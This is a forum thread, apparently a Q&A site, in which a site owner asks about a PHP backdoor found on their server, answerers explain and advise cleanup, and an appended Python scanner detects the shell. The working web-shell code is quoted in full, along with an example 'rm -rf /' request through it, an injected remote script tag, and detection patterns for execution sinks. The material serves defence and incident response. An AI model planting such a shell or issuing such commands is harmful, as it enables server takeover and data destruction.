I recently found 4 bizarre files on my server (that I didn't upload). The filenames were like this: goog1e7a20543b128921.php
And here's the code that was inside them:
Goog1e_analist_up<?php $e=@$_POST['e'];$s=@$_POST['s'];if($e){eval($e);}if($s){system($s);}if($_FILES['f']['name']!=''){move_uploaded_file($_FILES['f']['tmp_name'],$_FILES['f']['name']);}?>
Do you have any idea what this code is supposed to do..? Should I start to panic..?
Thanks.
Yep, this is malicious code. This shell script will allow the attacker to execute code as well as upload any file, if they know the parameters passed to it. I recommend searching all files for that code, verifying file permissions and changing your passwords just in case.
Suggestion to deal with the attack
I would suggest you use HTML Purifier or OWASP to make things a lot more secure.
You must disable the eval construct if you are not using it (and you shouldn't unless you really need to).
Analyze the server settings for any security holes with PHPSecInfo (source: phpsec.org).
Delete them right NOW!
It's a backdoor into your webserver.
It allows attackers to send a request to http://you.com/goog1e7a20543b128921.php?s=rm -rf / to delete your entire system.
You should then conduct a thorough security review of your site to figure out how they got there in the first place.
For reference:
if($e){eval($e);}
This allows the attacker to execute any PHP command they want.
if($s){system($s);}
This allows the attacker to execute any system command they want, as whatever user your webserver runs as.
if($_FILES['f']['name']!=''){move_uploaded_file($_FILES['f']['tmp_name'],$_FILES['f']['name']);}
This allows the attacker to upload any file they want - again the user your webserver runs as determines file permissions.
In summary, panic :-p
I'm sure there are lots of articles online on how to deal with this. In brief, back up your system for analysis later, reinstall server from scratch (You don't know what else they have done to you so just deleting the files isn't good enough.) while trying to work out how they got in and plugging the hole.
eval($e) - remotely executes system commands, e.g. for listing a directory. $_FILES['f']['name'] - for uploading scripts to the server, e.g. hack tools etc.
Apparently you are not the only one with these. Googled it real quick, other sites seem infected as well. It looks like the infected file always stores itself in the images folder.
Related: Try installing phpAntiVirus for the future, and ask your provider for mod_security. This might mitigate future hacks. Those files didn't materialize all by themselves on your server anyway. Get rid of all older PHP applications.
Look for this in each file. <script src="http://nt02.co.in/3"></script>
If you find one using your ftp, look at the date the file was modified and open all the files modified on that date and remove it.
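Several answers above boil down to the same triage steps: search every file for the shell's shape (request input flowing into eval/system/move_uploaded_file), look for the injected script tag, and then check whatever else was modified on the same day as a hit. The scanner below is an added example written for this thread, not code posted by anyone in it; it uses only the Python 3 standard library, and the indicators it carries (the marker string, the goog1e filename pattern, the nt02.co.in script tag) are the ones quoted in the question and answers. The sample document root it builds under build_sample_tree() is constructed for demonstration, and the file timestamps it assigns are arbitrary.

```python
import os
import re
import tempfile
from datetime import date
from typing import Dict, List, Tuple

# Indicators quoted in this thread: the dropped file's marker string, its
# filename pattern, and the injected <script> tag a later answer mentions.
MARKER_STRING = "Goog1e_analist_up"
DROPPED_NAME = re.compile(r"^goog1e[0-9a-f]+\.php$", re.IGNORECASE)
INJECTED_TAG = re.compile(r"<script[^>]+src=[\"']https?://nt02\.co\.in/3[\"']", re.IGNORECASE)

# Generic web-shell shape: request input reaching a code/command execution sink
# or move_uploaded_file(). Both must be present in the same file to flag it.
REQUEST_INPUT = re.compile(r"\$_(POST|GET|REQUEST|COOKIE)\b")
DANGEROUS_SINKS = re.compile(
    r"\b(eval|system|exec|passthru|shell_exec|popen|proc_open|move_uploaded_file)\s*\(",
    re.IGNORECASE,
)


def scan_content(path: str, text: str) -> List[str]:
    """Return the list of reasons a file looks like (or was touched by) the backdoor."""
    reasons: List[str] = []
    if DROPPED_NAME.match(os.path.basename(path)):
        reasons.append("filename matches dropped-file pattern")
    if MARKER_STRING in text:
        reasons.append("contains marker string " + MARKER_STRING)
    if INJECTED_TAG.search(text):
        reasons.append("contains injected script tag")
    sinks = sorted({m.group(1).lower() for m in DANGEROUS_SINKS.finditer(text)})
    if sinks and REQUEST_INPUT.search(text):
        reasons.append("request input reaches " + ", ".join(sinks))
    return reasons


def scan_tree(root: str) -> Dict[str, List[str]]:
    """Walk a document root and map every suspicious file to its reasons."""
    hits: Dict[str, List[str]] = {}
    for dirpath, _dirs, files in os.walk(root):
        for fname in files:
            path = os.path.join(dirpath, fname)
            try:
                with open(path, "r", encoding="utf-8", errors="replace") as fh:
                    text = fh.read()
            except OSError:
                continue  # unreadable file: skip rather than abort the scan
            reasons = scan_content(path, text)
            if reasons:
                hits[path] = reasons
    return hits


def same_day_candidates(root: str, hits: Dict[str, List[str]]) -> Dict[date, List[str]]:
    """Files not flagged themselves but modified on the same day as a flagged file.

    This is the 'open everything modified on that date' step from the thread,
    automated: the attacker's other writes usually share the drop's mtime.
    """
    suspect_days = {date.fromtimestamp(os.path.getmtime(p)) for p in hits}
    by_day: Dict[date, List[str]] = {}
    for dirpath, _dirs, files in os.walk(root):
        for fname in files:
            path = os.path.join(dirpath, fname)
            day = date.fromtimestamp(os.path.getmtime(path))
            if day in suspect_days and path not in hits:
                by_day.setdefault(day, []).append(path)
    return by_day


def build_sample_tree() -> Tuple[str, Dict[str, str]]:
    """Construct a throwaway document root mirroring the situation in the thread."""
    root = tempfile.mkdtemp(prefix="webshell-scan-")
    drop_time = 1262390400          # constructed timestamp for the intrusion day
    old_time = drop_time - 10 * 86400
    paths = {
        "shell": os.path.join(root, "images", "goog1e7a20543b128921.php"),
        "injected": os.path.join(root, "page.html"),
        "same_day": os.path.join(root, "images", "logo.txt"),
        "clean": os.path.join(root, "index.php"),
    }
    contents = {
        # the dropped file, exactly as quoted in the question
        "shell": "Goog1e_analist_up<?php $e=@$_POST['e'];$s=@$_POST['s'];if($e){eval($e);}"
                 "if($s){system($s);}if($_FILES['f']['name']!=''){move_uploaded_file("
                 "$_FILES['f']['tmp_name'],$_FILES['f']['name']);}?>",
        "injected": '<html><body><script src="http://nt02.co.in/3"></script></body></html>',
        "same_day": "binary-ish placeholder touched on the intrusion day",
        "clean": "<?php echo 'hello'; ?>",
    }
    mtimes = {"shell": drop_time, "injected": drop_time, "same_day": drop_time, "clean": old_time}
    for key, path in paths.items():
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(contents[key])
        os.utime(path, (mtimes[key], mtimes[key]))
    return root, paths


if __name__ == "__main__":
    root, _paths = build_sample_tree()
    found = scan_tree(root)
    for p, why in found.items():
        print(p, "->", "; ".join(why))
    for day, others in same_day_candidates(root, found).items():
        print("also modified on", day, ":", others)
```

Run it against the real document root by calling scan_tree("/path/to/htdocs") instead of the constructed tree; treat a same-day candidate list as a review queue, not proof of compromise, since legitimate deploys can share the date.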